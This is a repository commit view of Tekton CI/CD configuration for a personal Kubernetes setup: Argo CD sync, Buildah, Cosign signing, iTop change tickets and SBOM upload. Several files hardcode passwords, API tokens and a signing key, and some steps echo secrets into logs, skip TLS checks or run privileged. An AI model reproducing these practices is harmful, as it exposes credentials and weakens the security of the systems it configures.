AllardDCS/kubernetes
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

initial commit

Browse Source
This commit is contained in:
allard
2025-11-23 18:58:51 +01:00
commit 376a944abc
1553 changed files with 314731 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

18
dev/tekton/tasks/argocd-sync-and-wait/app-project.yaml Normal file
View File

@@ -0,0 +1,18 @@
apiVersion: argoproj.io/v1alpha1
kind: AppProject
metadata:
name: default
namespace: argocd
spec:
description: Default project
destinations:
- namespace: '*'
server: https://kubernetes.default.svc
sourceRepos:
- '*'
clusterResourceWhitelist:
- group: '*'
kind: '*'
namespaceResourceBlacklist:
- group: backstage.io
kind: Component

7
dev/tekton/tasks/argocd-sync-and-wait/argocd-env-configmap.yaml Normal file
View File

@@ -0,0 +1,7 @@
apiVersion: v1
kind: ConfigMap
metadata:
name: argocd-env-configmap
namespace: default
data:
ARGOCD_SERVER: argocd-dev.allarddcs.nl

10
dev/tekton/tasks/argocd-sync-and-wait/argocd-pipeline-run.yaml Executable file
View File

@@ -0,0 +1,10 @@
apiVersion: tekton.dev/v1beta1
kind: PipelineRun
metadata:
generateName: argocd-pipeline-run-
spec:
pipelineRef:
name: argocd-pipeline-test
params:
- name: sonar-project-key
value: olproperties

19
dev/tekton/tasks/argocd-sync-and-wait/argocd-pipeline.yaml Executable file
View File

@@ -0,0 +1,19 @@
apiVersion: tekton.dev/v1beta1
kind: Pipeline
metadata:
name: argocd-pipeline-test
spec:
description: |
This pipeline tests argocd
params:
- name: sonar-project-key
type: string
tasks:
- name: deploy-with-argocd
taskref:
name: argocd-task-sync-and-wait
params:
- name: application-name
value: $(params.sonar-project-key)

43
dev/tekton/tasks/argocd-sync-and-wait/argocd-task-sync-and-wait.yaml Normal file
View File

@@ -0,0 +1,43 @@
apiVersion: tekton.dev/v1
kind: Task
metadata:
name: argocd-task-sync-and-wait
namespace: default
spec:
description: |-
This task syncs (deploys) an Argo CD application and waits for it to be healthy.
To do so, it requires the address of the Argo CD server and some form of authentication either a username/password or an authentication token.
params:
- description: name of the application to sync
name: application-name
type: string
- default: HEAD
description: the revision to sync to
name: revision
type: string
- default: --
name: flags
type: string
- default: v2.2.2
name: argocd-version
type: string
stepTemplate:
computeResources: {}
envFrom:
- configMapRef:
name: argocd-env-configmap
- secretRef:
name: argocd-env-secret
steps:
- computeResources: {}
image: argoproj/argocd
name: login
script: |
echo "ARGOCD_SERVER = " $ARGOCD_SERVER
echo "ARGOCD_USERNAME = " $ARGOCD_USERNAME
echo "ARGOCD_PASSWORD = " $ARGOCD_PASSWORD
if [ -z "$ARGOCD_AUTH_TOKEN" ]; then
yes | argocd login "$ARGOCD_SERVER" --username="$ARGOCD_USERNAME" --password="$ARGOCD_PASSWORD";
fi
argocd app sync "$(params.application-name)" --revision "$(params.revision)" "$(params.flags)"
argocd app wait "$(params.application-name)" --health "$(params.flags)"

3
dev/tekton/tasks/argocd-sync-and-wait/create-argocd-env-secret.sh Executable file
View File

@@ -0,0 +1,3 @@
microk8s kubectl create secret generic argocd-env-secret \
--from-literal=ARGOCD_USERNAME=admin \
--from-literal=ARGOCD_PASSWORD='Argocd01@'

18
dev/tekton/tasks/argocd-sync-and-wait/default-project.yaml Normal file
View File

@@ -0,0 +1,18 @@
apiVersion: argoproj.io/v1alpha1
kind: AppProject
metadata:
name: default
namespace: argocd
spec:
description: Default project
destinations:
- namespace: '*' # Allow all namespaces
server: https://kubernetes.default.svc
sourceRepos:
- '*' # Allow all repositories
clusterResourceWhitelist:
- group: '*' # Allow all cluster-scoped resources
kind: '*'
namespaceResourceBlacklist:
- group: backstage.io # Exclude all Backstage API group
kind: Component # Exclude Component kind

64
dev/tekton/tasks/argocd-sync-or-deploy/argocd-sync-or-deploy.yaml Normal file
View File

@@ -0,0 +1,64 @@
apiVersion: tekton.dev/v1
kind: Task
metadata:
name: argocd-sync-or-deploy
namespace: default
spec:
params:
- name: appName
type: string
description: The name of the ArgoCD application
- name: appRepoURL
type: string
description: The Git repository URL for the ArgoCD application
- name: appRepoRevision
type: string
description: The Git repository revision (e.g., branch, tag)
- name: appPath
type: string
description: The path to the ArgoCD application manifests in the Git repository
- name: argocdServer
type: string
description: The ArgoCD server URL
- name: argocdUsername
type: string
description: The ArgoCD username for authentication
- name: argocdPassword
type: string
description: The ArgoCD password for authentication
stepTemplate:
computeResources: {}
envFrom:
- configMapRef:
name: argocd-env-configmap
- secretRef:
name: argocd-env-secret
steps:
- name: sync-argocd-app
image: quay.io/argoproj/argocd-cli:v2.8.3
script: |
#!/bin/bash
echo "ARGOCD_SERVER = " $ARGOCD_SERVER
echo "ARGOCD_USERNAME = " $ARGOCD_USERNAME
echo "ARGOCD_PASSWORD = " $ARGOCD_PASSWORD
# Login to ArgoCD
argocd login $(params.argocdServer) --username $(params.argocdUsername) --password $(params.argocdPassword) --insecure
# Check if the application already exists
if argocd app list | grep -q $(params.appName); then
echo "Application $(params.appName) exists. Updating the application..."
# Sync the existing application to update
argocd app sync $(params.appName) --revision $(params.appRepoRevision) --insecure
else
echo "Application $(params.appName) does not exist. Creating a new application..."
# Create a new application if it doesn't exist
argocd app create $(params.appName) \
--repo $(params.appRepoURL) \
--revision $(params.appRepoRevision) \
--path $(params.appPath) \
--dest-server https://kubernetes.default.svc \
--dest-namespace default \
--insecure
fi
workspaces:
- name: source-dir
optional: true

106
dev/tekton/tasks/buildah/buildah.yaml Normal file
View File

@@ -0,0 +1,106 @@
apiVersion: tekton.dev/v1
kind: Task
metadata:
annotations:
kubectl.kubernetes.io/last-applied-configuration: |
{"apiVersion":"tekton.dev/v1beta1","kind":"Task","metadata":{"annotations":{"tekton.dev/categories":"Image Build","tekton.dev/pipelines.minVersion":"0.17.0","tekton.dev/platforms":"linux/amd64,linux/s390x,linux/ppc64le,linux/arm64","tekton.dev/tags":"image-build"},"labels":{"app.kubernetes.io/version":"0.5"},"name":"buildah","namespace":"default"},"spec":{"description":"Buildah task builds source into a container image and then pushes it to a container registry.\nBuildah Task builds source into a container image using Project Atomic's Buildah build tool.It uses Buildah's support for building from Dockerfiles, using its buildah bud command.This command executes the directives in the Dockerfile to assemble a container image, then pushes that image to a container registry.","params":[{"description":"Reference of the image buildah will produce.","name":"IMAGE"},{"default":"quay.io/buildah/stable:v1.23.3","description":"The location of the buildah builder image.","name":"BUILDER_IMAGE"},{"default":"overlay","description":"Set buildah storage driver","name":"STORAGE_DRIVER"},{"default":"./Dockerfile","description":"Path to the Dockerfile to build.","name":"DOCKERFILE"},{"default":".","description":"Path to the directory to use as context.","name":"CONTEXT"},{"default":"true","description":"Verify the TLS on the registry endpoint (for push/pull to a non-TLS registry)","name":"TLSVERIFY"},{"default":"oci","description":"The format of the built container, oci or docker","name":"FORMAT"},{"default":"","description":"Extra parameters passed for the build command when building images.","name":"BUILD_EXTRA_ARGS"},{"default":"","description":"Extra parameters passed for the push command when pushing images.","name":"PUSH_EXTRA_ARGS","type":"string"},{"default":"false","description":"Skip pushing the built image","name":"SKIP_PUSH"}],"results":[{"description":"Digest of the image just built.","name":"IMAGE_DIGEST"},{"description":"Image repository where the built image would be pushed to","name":"IMAGE_URL"}],"steps":[{"image":"$(params.BUILDER_IMAGE)","name":"build","script":"[[ \"$(workspaces.sslcertdir.bound)\" == \"true\" ]] \u0026\u0026 CERT_DIR_FLAG=\"--cert-dir $(workspaces.sslcertdir.path)\"\n[[ \"$(workspaces.dockerconfig.bound)\" == \"true\" ]] \u0026\u0026 export DOCKER_CONFIG=\"$(workspaces.dockerconfig.path)\"\nbuildah ${CERT_DIR_FLAG} --storage-driver=$(params.STORAGE_DRIVER) bud \\\n $(params.BUILD_EXTRA_ARGS) --format=$(params.FORMAT) \\\n --tls-verify=$(params.TLSVERIFY) --no-cache \\\n -f $(params.DOCKERFILE) -t $(params.IMAGE) $(params.CONTEXT)\n[[ \"$(params.SKIP_PUSH)\" == \"true\" ]] \u0026\u0026 echo \"Push skipped\" \u0026\u0026 exit 0\nbuildah ${CERT_DIR_FLAG} --storage-driver=$(params.STORAGE_DRIVER) push \\\n $(params.PUSH_EXTRA_ARGS) --tls-verify=$(params.TLSVERIFY) \\\n --digestfile /tmp/image-digest $(params.IMAGE) \\\n docker://$(params.IMAGE)\ncat /tmp/image-digest | tee $(results.IMAGE_DIGEST.path)\necho -n \"$(params.IMAGE)\" | tee $(results.IMAGE_URL.path)\n","securityContext":{"privileged":true},"volumeMounts":[{"mountPath":"/var/lib/containers","name":"varlibcontainers"}],"workingDir":"$(workspaces.source.path)"}],"volumes":[{"emptyDir":{},"name":"varlibcontainers"}],"workspaces":[{"name":"source"},{"name":"sslcertdir","optional":true},{"description":"An optional workspace that allows providing a .docker/config.json file for Buildah to access the container registry. The file should be placed at the root of the Workspace with name config.json.","name":"dockerconfig","optional":true}]}}
tekton.dev/categories: Image Build
tekton.dev/pipelines.minVersion: 0.17.0
tekton.dev/platforms: linux/amd64,linux/s390x,linux/ppc64le,linux/arm64
tekton.dev/tags: image-build
creationTimestamp: "2024-02-28T10:37:30Z"
generation: 1
labels:
app.kubernetes.io/version: "0.5"
name: buildah
namespace: default
resourceVersion: "670600"
uid: be7a4925-c0ff-4397-8056-2842f9844108
spec:
description: |-
Buildah task builds source into a container image and then pushes it to a container registry.
Buildah Task builds source into a container image using Project Atomic's Buildah build tool.It uses Buildah's support for building from Dockerfiles, using its buildah bud command.This command executes the directives in the Dockerfile to assemble a container image, then pushes that image to a container registry.
params:
- description: Reference of the image buildah will produce.
name: IMAGE
type: string
- default: quay.io/buildah/stable:v1.23.3
description: The location of the buildah builder image.
name: BUILDER_IMAGE
type: string
- default: overlay
description: Set buildah storage driver
name: STORAGE_DRIVER
type: string
- default: ./Dockerfile
description: Path to the Dockerfile to build.
name: DOCKERFILE
type: string
- default: .
description: Path to the directory to use as context.
name: CONTEXT
type: string
- default: "true"
description: Verify the TLS on the registry endpoint (for push/pull to a non-TLS
registry)
name: TLSVERIFY
type: string
- default: oci
description: The format of the built container, oci or docker
name: FORMAT
type: string
- default: ""
description: Extra parameters passed for the build command when building images.
name: BUILD_EXTRA_ARGS
type: string
- default: ""
description: Extra parameters passed for the push command when pushing images.
name: PUSH_EXTRA_ARGS
type: string
- default: "false"
description: Skip pushing the built image
name: SKIP_PUSH
type: string
results:
- description: Digest of the image just built.
name: IMAGE_DIGEST
type: string
- description: Image repository where the built image would be pushed to
name: IMAGE_URL
type: string
steps:
- computeResources: {}
image: $(params.BUILDER_IMAGE)
name: build
script: |
[[ "$(workspaces.sslcertdir.bound)" == "true" ]] && CERT_DIR_FLAG="--cert-dir $(workspaces.sslcertdir.path)"
[[ "$(workspaces.dockerconfig.bound)" == "true" ]] && export DOCKER_CONFIG="$(workspaces.dockerconfig.path)"
buildah ${CERT_DIR_FLAG} --storage-driver=$(params.STORAGE_DRIVER) bud \
$(params.BUILD_EXTRA_ARGS) --format=$(params.FORMAT) \
--tls-verify=$(params.TLSVERIFY) --no-cache \
-f $(params.DOCKERFILE) -t $(params.IMAGE) $(params.CONTEXT)
[[ "$(params.SKIP_PUSH)" == "true" ]] && echo "Push skipped" && exit 0
buildah ${CERT_DIR_FLAG} --storage-driver=$(params.STORAGE_DRIVER) push \
$(params.PUSH_EXTRA_ARGS) --tls-verify=$(params.TLSVERIFY) \
--digestfile /tmp/image-digest $(params.IMAGE) \
docker://$(params.IMAGE)
cat /tmp/image-digest | tee $(results.IMAGE_DIGEST.path)
echo -n "$(params.IMAGE)" | tee $(results.IMAGE_URL.path)
securityContext:
privileged: true
volumeMounts:
- mountPath: /var/lib/containers
name: varlibcontainers
workingDir: $(workspaces.source.path)
volumes:
- emptyDir: {}
name: varlibcontainers
workspaces:
- name: source
- name: sslcertdir
optional: true
- description: An optional workspace that allows providing a .docker/config.json
file for Buildah to access the container registry. The file should be placed
at the root of the Workspace with name config.json.
name: dockerconfig
optional: true

73
dev/tekton/tasks/cosign/cosign-pipeline-run.yaml Executable file
View File

@@ -0,0 +1,73 @@
apiVersion: tekton.dev/v1beta1
kind: PipelineRun
metadata:
generateName: cosign-pipeline-run-
spec:
pipelineRef:
name: cosign-pipeline
#gitea:
params:
- name: repo-url
value: http://gitea.gitea.svc.cluster.local:3000/allard/olproperties.git
- name: git-revision
value: 1.3
#maven:
- name: maven-mirror-url
value: 'http://nexus.nexus.svc.cluster.local:8081/repository/maven-public/'
#sonarqube:
- name: sonar-organization
value: "allarddcs"
- name: sonar-project-key
value: olproperties
- name: sonar-token
value: sqp_214ee7c92e1b82b0d43dd9b1d9462eac8f50434c
- name: sonar-host-url
value: "https://sonarqube-dev.allarddcs.nl"
- name: source-to-scan
value: ./src
#push-to-harbor:
- name: registry
value: harbor-dev.allarddcs.nl
- name: project
value: allard
- name: image-name
value: olproperties
#cosign
- name: cosign-image-url
value: harbor-dev.allarddcs.nl/allard/olproperties
#dependency-track
- name: deptrack-apiKey
value: odt_BRpq4el8T0XqdeunYMnefniaS0n8Yxd8
- name: deptrack-projectName
value: olproperties
- name: deptrack-projectVersion
value: 1.1
- name: deptrack-url
value: https://deptracka-dev.allarddcs.nl
workspaces:
- name: shared-data
volumeClaimTemplate:
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi
- name: maven-settings
persistentVolumeClaim:
emptyDir: {}
- name: sonar-settings
configmap:
name: sonar-properties
- name: registry-credentials
secret:
secretName: registry-credentials
items:
- key: .dockerconfigjson
path: config.json

64
dev/tekton/tasks/cosign/cosign-pipeline.yaml Executable file
View File

@@ -0,0 +1,64 @@
apiVersion: tekton.dev/v1beta1
kind: Pipeline
metadata:
name: cosign-pipeline
spec:
description: |
This pipeline clones a git repo, builds a Docker image with Kaniko and
pushes it to a registry
params:
- name: repo-url
type: string
- name: git-revision
type: string
- name: maven-mirror-url
type: string
- name: sonar-organization
type: string
- name: sonar-project-key
type: string
- name: sonar-token
type: string
- name: sonar-host-url
type: string
- name: source-to-scan
type: string
- name: registry
type: string
- name: project
type: string
- name: image-name
type: string
- name: cosign-image-url
type: string
- name: deptrack-projectName
type: string
- name: deptrack-projectVersion
type: string
- name: deptrack-apiKey
type: string
- name: deptrack-url
type: string
workspaces:
- name: shared-data
- name: registry-credentials
- name: maven-settings
- name: sonar-settings
tasks:
- name: cosign-sign
taskRef:
name: cosign-sign
params:
- name: cosign-image-url
value: $(params.registry)/$(params.project)/$(params.image-name):$(params.git-revision)
- name: cosign-image-digest
value: sha256:bfb0a7c2b8960ec9a1f61df004bfea8826ab9bf95454368aead0acce929654a4

18
dev/tekton/tasks/cosign/cosign-sign-pipeline-run.yaml Normal file
View File

@@ -0,0 +1,18 @@
apiVersion: tekton.dev/v1beta1
kind: PipelineRun
metadata:
generateName: cosign-pipeline-run-
spec:
pipelineRef:
name: cosign-sign-pipeline # This refers to your pipeline defined earlier
params:
- name: image
value: "harbor-dev.allarddcs.nl/allard/olproperties:1.3"
- name: cosign-password
valueFrom:
secretKeyRef:
name: cosign-password-secret
key: password

15
dev/tekton/tasks/cosign/cosign-sign-pipeline.yaml Normal file
View File

@@ -0,0 +1,15 @@
apiVersion: tekton.dev/v1beta1
kind: Pipeline
metadata:
name: cosign-sign-pipeline
spec:
params:
- name: image
type: string
tasks:
- name: sign-image
taskRef:
name: cosign-sign
params:
- name: image
value: $(params.image)

69
dev/tekton/tasks/cosign/cosign-sign.yaml Normal file
View File

@@ -0,0 +1,69 @@
apiVersion: tekton.dev/v1beta1
kind: Task
metadata:
name: cosign-sign
spec:
params:
- name: cosign-image-url
description: The image to sign (e.g., harbor.example.com/repo/image:tag)
type: string
- name: cosign-image-digest
type: string
steps:
- name: debug
image: busybox
command: [ "sh", "-c" ]
args:
- "cat /root/.docker/config.json"
volumeMounts:
- name: registry-credentials
mountPath: /root/.docker/config.json
subPath: .dockerconfigjson
- name: cosign-sign
# image: ghcr.io/sigstore/cosign:v2.4.1
image: bitnamilegacy/cosign
securityContext:
runAsUser: 0 # Run as root
runAsGroup: 0 # Group ID for root
privileged: true # Allow privileged operations (if needed)
env:
- name: COSIGN_ACCEPT
value: "Y" # Automatically agree to the terms & conditions
- name: COSIGN_PASSWORD
value: "Harbor01@"
script: |
#!/bin/bash
cosign login harbor-dev.allarddcs.nl -u admin -p Harbor01@
set -e
echo "Signing image: $(params.cosign-image-url)"
# Sign the image with Cosign
echo "y" | cosign sign --key /cosign-keys/key $(params.cosign-image-url)@$(params.cosign-image-digest)
volumeMounts:
- name: cosign-key
mountPath: /cosign-keys # Mount the secret at /cosign-keys
- name: registry-credentials
mountPath: /root/.docker/config.json
subPath: .dockerconfigjson
- name: docker-socket
mountPath: /var/run/docker.sock # Mount the Docker socket inside the container
volumes:
- name: cosign-key
secret:
secretName: cosign-key-secret # Secret name for the Cosign key
items:
- key: cosign.key # Key in the secret that holds the Cosign private key
path: key # Path inside the container where the key will be available (i.e., /cosign-keys/key)
- name: registry-credentials
secret:
secretName: registry-credentials # Secret containing Harbor credentials (from the previous step)
items:
- key: .dockerconfigjson # Mount the Docker config to the right place
path: .dockerconfigjson
- name: docker-socket
hostPath:
path: /var/run/docker.sock # Mount the Docker socket
type: Socket

11
dev/tekton/tasks/cosign/cosign.key Normal file
View File

@@ -0,0 +1,11 @@
-----BEGIN ENCRYPTED SIGSTORE PRIVATE KEY-----
eyJrZGYiOnsibmFtZSI6InNjcnlwdCIsInBhcmFtcyI6eyJOIjo2NTUzNiwiciI6
OCwicCI6MX0sInNhbHQiOiJ5c2d3bWNPQUpIKzVyR1h1OFRyZDY4UnpsVkkrZGRM
MnA4cDBpdytaTEY4PSJ9LCJjaXBoZXIiOnsibmFtZSI6Im5hY2wvc2VjcmV0Ym94
Iiwibm9uY2UiOiJjNUtMSyt2YmphbWtWQWs5SFJJcHZpL1BmNlBENW5uZSJ9LCJj
aXBoZXJ0ZXh0IjoiVTVub2ZDLzd1MUtza1dqNWl2TGp4bW1GZ2pseVY1VnZkeGVr
SmE5Ukkvbm1CWk53aHJsWWNUQjBRUGlTMUNlaVh5RGlqZnNNT1d4Tnh0Y3U5akxI
a1BsMnNkNW0wVy91dlJrRmRWRVlFcXFCQWlrbzg3aW9oVkVxWC9CQitvaEd2Rkt0
bWZBTU8yaUtwTm8wRmxieldHaW9sOFlKNHRCZlNZWlFrY055WGF1ait5Z3ovaTJK
NG5tajBRWDM1QlhpQjQwa1ladXhhaDRsRkE9PSJ9
-----END ENCRYPTED SIGSTORE PRIVATE KEY-----

4
dev/tekton/tasks/cosign/cosign.pub Normal file
View File

@@ -0,0 +1,4 @@
-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE7PCFjmQqVhO6j6uPMcLrFhEgFSeG
vlpDy1WNaOUie/f40NIfRrA8nusDm5Kj7PF2X+zgGlQbgpjHpJd7iOMG2g==
-----END PUBLIC KEY-----

19
dev/tekton/tasks/cosign/cosign.yaml Normal file
View File

@@ -0,0 +1,19 @@
apiVersion: v1
kind: Pod
metadata:
name: cosign-debug
spec:
containers:
- name: cosign
image: bitnami/cosign
command: ["sleep", "3600"]
volumeMounts:
- name: cosign-key
mountPath: /cosign
volumes:
- name: cosign-key
secret:
secretName: cosign-key-secret
items:
- key: cosign.key
path: key

1
dev/tekton/tasks/cosign/create-cosign-key-secret.sh Executable file
View File

@@ -0,0 +1 @@
microk8s kubectl create secret generic cosign-key-secret --from-file=cosign.key=/home/ubuntu/containers/kubernetes/tekton/tasks/cosign/cosign.key

1
dev/tekton/tasks/cosign/create-cosign-password-secret.sh Executable file
View File

@@ -0,0 +1 @@
microk8s kubectl create secret generic cosign-password-secret --from-literal=password=Harbor01@

31
dev/tekton/tasks/curl/curl-task.yaml Executable file
View File

@@ -0,0 +1,31 @@
apiVersion: tekton.dev/v1
kind: Task
metadata:
name: curl
spec:
description: This task performs curl operation to transfer data from internet.
params:
- description: URL to curl'ed
name: url
type: string
- default: []
description: options of url
name: options
type: array
- default: docker.io/curlimages/curl:7.72.0@sha256:bd5bbd35f89b867c1dccbc84b8be52f3f74dea20b46c5fe0db3780e040afcb6f
description: option of curl image
name: curl-image
type: string
steps:
- args:
- $(params.options[*])
- $(params.url)
command:
- curl
computeResources: {}
image: $(params.curl-image)
name: curl
workingDir: $(workspaces.source-dir.path)
workspaces:
- name: source-dir
optional: true

16
dev/tekton/tasks/hash/hash-pipeline-run.yaml Normal file
View File

@@ -0,0 +1,16 @@
apiVersion: tekton.dev/v1beta1
kind: PipelineRun
metadata:
name: build-and-deploy-pipelinerun-commit-hash
spec:
pipelineRef:
name: build-and-deploy-pipeline
params:
- name: git-repository-url
value: "https://gitea.example.com/yourorg/yourrepo.git"
- name: git-revision
value: "main" # Specify the branch/tag you want to build from
resources:
- name: clone-repo
resourceRef:
name: git-repo-resource # This should be a Tekton Git resource if using Tekton resources

69
dev/tekton/tasks/hash/hash-pipeline.yaml Normal file
View File

@@ -0,0 +1,69 @@
apiVersion: tekton.dev/v1beta1
kind: Pipeline
metadata:
name: build-and-deploy-pipeline
spec:
tasks:
- name: clone-repo
taskRef:
name: git-clone
params:
- name: url
value: "https://gitea.example.com/yourorg/yourrepo.git"
- name: revision
value: "main" # or any branch or tag
- name: get-git-commit-hash
taskSpec:
steps:
- name: get-commit-hash
image: busybox
script: |
#!/bin/sh
# Get the current Git commit hash
COMMIT_HASH=$(git rev-parse --short HEAD)
echo "COMMIT_HASH=$COMMIT_HASH" > $(results.commit-hash.path)
results:
- name: commit-hash
description: The short Git commit hash
- name: build-image
taskRef:
name: kaniko
params:
- name: IMAGE
value: "harbor.example.com/myproject/myapp:$(results.commit-hash.commit-hash)"
- name: CONTEXT
value: "$(resources.clone-repo.results.git-dir)"
- name: DOCKERFILE
value: "$(resources.clone-repo.results.git-dir)/Dockerfile"
- name: REGISTRY
value: "harbor.example.com"
resources:
inputs:
- name: clone-repo
resource: clone-repo
- name: push-image
taskRef:
name: kaniko-push
params:
- name: IMAGE
value: "harbor.example.com/myproject/myapp:$(results.commit-hash.commit-hash)"
- name: REGISTRY
value: "harbor.example.com"
resources:
inputs:
- name: build-image
resource: build-image
- name: trigger-argocd
taskRef:
name: argocd-sync
params:
- name: app-name
value: "myapp"
- name: project
value: "myproject"
- name: sync-options
value: "--prune --retry"

39
dev/tekton/tasks/register-change/register-change-task.yaml Executable file
View File

@@ -0,0 +1,39 @@
apiVersion: tekton.dev/v1 # or tekton.dev/v1beta1
kind: Task
metadata:
name: register-change
spec:
params:
- name: project
type: string
- name: git-revision
type: string
steps:
- name: register-change
image: apteno/alpine-jq
script: |
ITOP_URL="https://itop-dev.allarddcs.nl"
ITOP_USER="tekton"
ITOP_PWD="Itop01@@@"
ORGANIZATION="0001"
TITLE="Container $(params.project).$(params.git-revision) "
DESCRIPTION="Container $(params.project).$(params.git-revision) created"
CALLER="tekton"
COMMENT="new version of container $(params.project) has been pushed"
CHANGE="RoutineChange"
# Let's create the ticket via the REST/JSON API
JSON_DATA='{"operation":"core/create", "class":"'"${CHANGE}"'", "fields": {"org_id":"'"${ORGANIZATION}"'", "title":"'"$TITLE"'", "description":"'"$DESCRIPTION"'"}, "caller": "'"$CALLER"'", "comment": "'"$COMMENT"'"}'
RESULT=`wget -q --post-data='auth_user='"${ITOP_USER}"'&auth_pwd='"${ITOP_PWD}"'&json_data='"${JSON_DATA}" --no-check-certificate -O - "${ITOP_URL}/webservices/rest.php?version=1.0"`
if echo "$RESULT" | grep "created"
then
echo "Change created successfully"
echo "$RESULT"
else
echo "ERROR: failed to create change"
echo "$RESULT"
exit 1
fi
workingDir: $(workspaces.source-dir.path)
workspaces:
- name: source-dir
optional: true

21
dev/tekton/tasks/register-change/register-change.sh Executable file
View File

@@ -0,0 +1,21 @@
#!/bin/bash
ITOP_URL="http://itop.alldcs.nl"
ITOP_USER="tekton"
ITOP_PWD="Itop01@@@"
ORGANIZATION="0001"
TITLE="Containerchange"
DESCRIPTION="Container created"
CALLER="0001"
COMMENT="new version of container olproperties has been pushed"
CHANGE="RoutineChange"
# Let's create the ticket via the REST/JSON API
JSON_DATA='{"operation":"core/create", "class":"'"${CHANGE}"'", "fields": {"org_id":"'"${ORGANIZATION}"'", "title":"'"$TITLE"'", "description":"'"$DESCRIPTION"'"}, "caller": "'"$CALLER"'", "comment": "'"$COMMENT"'"}'
RESULT=`wget -q --post-data='auth_user='"${ITOP_USER}"'&auth_pwd='"${ITOP_PWD}"'&json_data='"${JSON_DATA}" --no-check-certificate -O - "${ITOP_URL}/webservices/rest.php?version=1.0"`
echo "$RESULT" | jq '.key'
if echo "$RESULT" | grep "created"
then
echo "Change created successfully"
else
echo "ERROR: failed to create change"
echo $RESULT
fi

3
dev/tekton/tasks/sbom/Dockerfile/Dockerfile Executable file
View File

@@ -0,0 +1,3 @@
FROM ubuntu
RUN apt update && apt upgrade -y
RUN apt install curl -y

1
dev/tekton/tasks/sbom/olproperties.sbom.json Normal file
View File

File diff suppressed because one or more lines are too long

50
dev/tekton/tasks/sbom/push-sbom.bak Normal file
View File

@@ -0,0 +1,50 @@
apiVersion: tekton.dev/v1
kind: Task
metadata:
name: push-sbom
namespace: default
spec:
params:
- description: The name of sbom
name: sbom
type: string
- description: The deptrack-authorisation-key to upload the sbom, put in secret
name: deptrack-apiKey
type: string
- description: The name of the deptrack-project
name: deptrack-projectName
type: string
- description: The version of the deptrack-project
name: deptrack-projectVersion
type: string
steps:
- computeResources: {}
image: allardkrings/ubuntu-curl:1.0
name: push-sbom
script: |
#!/usr/bin/env bash
if
curl -X POST \
-H 'Content-Type: multipart/form-data; boundary=__X_BOM__' \
-H "X-API-Key: odt_UPC8l0R9vzQILZIphSoK15J4u4Ns3HEy" \
-F "autoCreate=true" \
-F "projectName=olproperties" \
-F "projectVersion=1.1" \
-F "bom=@olproperties.sbom.json" \
"https://deptracka-dev.allarddcs.nl/api/v1/bom" \
| grep "token"
then
echo "sbom uploaded succesfully"
else
echo odt_UPC8l0R9vzQILZIphSoK15J4u4Ns3HEy
echo olproperties
echo 1.1
echo olproperties.sbom.json
ls
echo "upload sbom failed"
exit -1
fi
workingDir: $(workspaces.source-dir.path)
workspaces:
- name: source-dir
optional: true

56
dev/tekton/tasks/sbom/push-sbom.new Normal file
View File

@@ -0,0 +1,56 @@
apiVersion: tekton.dev/v1
kind: Task
metadata:
name: push-sbom
namespace: default
spec:
params:
- description: The name of sbom
name: sbom
type: string
- description: The deptrack-authorisation-key to upload the sbom, put in secret
name: deptrack-apiKey
type: string
- description: The name of the deptrack-project
name: deptrack-projectName
type: string
- description: The version of the deptrack-project
name: deptrack-projectVersion
type: string
- description: The URL of the DepTrack API
name: deptrack-url
type: string
steps:
- computeResources: {}
image: harbor-dev.allarddcs.nl/allard/curl:1.0
name: push-sbom
script: |
#!/usr/bin/env bash
# Run curl command and capture the output and error messages
response=$(curl -v -k -X POST \
-H 'Content-Type: multipart/form-data; boundary=__X_BOM__' \
-H "X-API-Key: $(params.deptrack-apiKey)" \
-F "autoCreate=true" \
-F "projectName=$(params.deptrack-projectName)" \
-F "projectVersion=$(params.deptrack-projectVersion)" \
-F "bom=@$(params.sbom)" \
"$(params.deptrack-url)/api/v1/bom" 2>&1)
# Check the response for a specific token or success message
if echo "$response" | grep -q "token"; then
echo "SBOM uploaded successfully"
else
# Print the error response from curl to diagnose the failure
echo $(params.deptrack-url)
echo $(params.deptrack-apiKey)
echo $(params.deptrack-projectName)
echo $(params.deptrack-projectVersion)
echo $(params.sbom)
echo "Failed to upload SBOM. Response from curl:"
echo "$response"
exit 1
fi
workingDir: $(workspaces.source-dir.path)
workspaces:
- name: source-dir
optional: true

50
dev/tekton/tasks/sbom/push-sbom.yaml Normal file
View File

@@ -0,0 +1,50 @@
apiVersion: tekton.dev/v1
kind: Task
metadata:
name: push-sbom
namespace: default
spec:
params:
- description: name of the image
name: image-reference
type: string
- description: The name of sbom
name: sbom
type: string
- description: The deptrack-authorisation-key to upload the sbom, put in secret
name: deptrack-apiKey
type: string
- description: The name of the deptrack-project
name: deptrack-projectName
type: string
- description: The version of the deptrack-project
name: deptrack-projectVersion
type: string
- description: The URL of the DepTrack API
name: deptrack-url
type: string
steps:
- computeResources: {}
image: harbor-dev.allarddcs.nl/allard/curl:1.0
name: push-sbom
script: |
#!/usr/bin/env bash
if curl -k -X POST \
-H 'Content-Type: multipart/form-data; boundary=__X_BOM__' \
-H "X-API-Key: $(params.deptrack-apiKey)" \
-F "autoCreate=true" \
-F "projectName=$(params.deptrack-projectName)" \
-F "projectVersion=$(params.deptrack-projectVersion)" \
-F "bom=@$(params.sbom)" \
"$(params.deptrack-url)/api/v1/bom" \
| grep "token"
then
echo "sbom uploaded successfully"
else
echo "Failed to upload sbom"
exit -1
fi
workingDir: $(workspaces.source-dir.path)
workspaces:
- name: source-dir
optional: true

30
dev/tekton/tasks/sbom/syft-push-pipeline-run.yaml Executable file
View File

@@ -0,0 +1,30 @@
apiVersion: tekton.dev/v1beta1
kind: PipelineRun
metadata:
generateName: syft-push-pipeline-run-
spec:
pipelineRef:
name: generate-and-push-sbom
params:
- name: image-reference
value: harbor-dev.allarddcs.nl/allard/olproperties:1.0
- name: deptrack-url
value: http://deptrack-apiserver.deptrack.svc.cluster.local:8080
- name: deptrack-projectName
value: olproperties
- name: deptrack-projectVersion
value: 1.1
- name: deptrack-apiKey
value: odt_BRpq4el8T0XqdeunYMnefniaS0n8Yxd8
- name: deptrack-options
value:
- ""
workspaces:
- name: shared-data
volumeClaimTemplate:
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi

55
dev/tekton/tasks/sbom/syft-push-pipeline.yaml Executable file
View File

@@ -0,0 +1,55 @@
apiVersion: tekton.dev/v1beta1
kind: Pipeline
